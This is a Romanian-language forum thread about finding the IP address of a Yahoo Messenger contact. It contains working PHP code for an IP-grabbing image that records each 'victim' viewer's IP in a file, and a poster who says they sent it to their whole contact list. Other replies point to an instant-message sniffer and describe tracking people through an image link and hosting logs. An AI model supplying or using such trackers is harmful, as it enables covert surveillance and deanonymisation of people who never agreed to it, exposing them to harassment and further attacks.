Jump to content
Pastilatu'

IP-ul celui care vorbesti pe mess

Recommended Posts

salut nu am reusit sa fac..sa aflu ipu..faceti un host ceva..cum salvez codu?in index.php ori in htaccess,sau urcatile pe un subdomeniu sa vad cum functioneaza si bagati-le la download..va rog.DA-TI VA ROG MAI DETALIAT...CA MAI SUNT SI ALTI PROSTI CA MINE

Edited by DEKAEN
Link to comment
Share on other sites

Ca idee, TOATE datele trec prin serverele Yahoo!

Am facut un test cu un transfer de fisier si fisierul era transmis tot printr-un server Yahoo!, deci nu poti vedea IP-ul celui cu care vorbesti pe messenger. :)

nu te contrazic dar uite ce am eu :


<?php
/* Setam header-ul */
header("Content-type: image/jpg");

/* Luam ip-ul victimei */
$ip= $_SERVER['REMOTE_ADDR'];

/* Construim imaginea */
$im = imagecreatetruecolor(280, 60);
$text_color = imagecolorallocate($im, 233, 888, 91);

/* Adaugam text in imagine */
imagestring($im, 2, 5, 5, "Ip-ul tau este : $ip", $text_color);
imagestring($im, 2, 5, 23, "by Maximus Spide", $text_color);

/* Esti prost daca editezi linia asta */
imagestring($im, 2, 5, 40, " maximusspide@aol.com", $text_color);

/* Aratam imaginea */
imagejpeg($im, NULL, 75);
imagedestroy($im);

/* Logam ip-ul victimei */
$f = fopen("ip.txt", "a");
fwrite($f, "[IP: $ip]\r\n");

/* Am terminat */
?>

(nu ca ar fi ceva special)

am dat celebrul mass in lista si in ip.txt erau toate ip-urile lor .

Sau poate doar ai aruncat asa .... o gluma =))

Link to comment
Share on other sites

http://www.intellectualheaven.com/Projects...0.7/SniffIM.zip - sniffeaza si conversatiile din retea, arata si ip-ul celor care discuta/cu care discuti.

| IntellectualHeaven ® Instant Message Sniffer |

| Copyright © IntellectualHeaven - Resources for Systems Programming and OS Development |

| All Rights Reserved. |

Asta imi apare. ip nu arata deloc.

Link to comment
Share on other sites

cel mai simplu e (pt cei care au un domeniu si acces cpanel) urci o imagine sus si pur si simplu i dai paste(cu link catre imaginea respectiva) celui caruia vrei sai afli IP yahoo incarca automat imaginile , dupa te uiti in cpanel ce ip a vizitat imaginea respectiva....e cel mai simplu parerea mea:)

HF

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...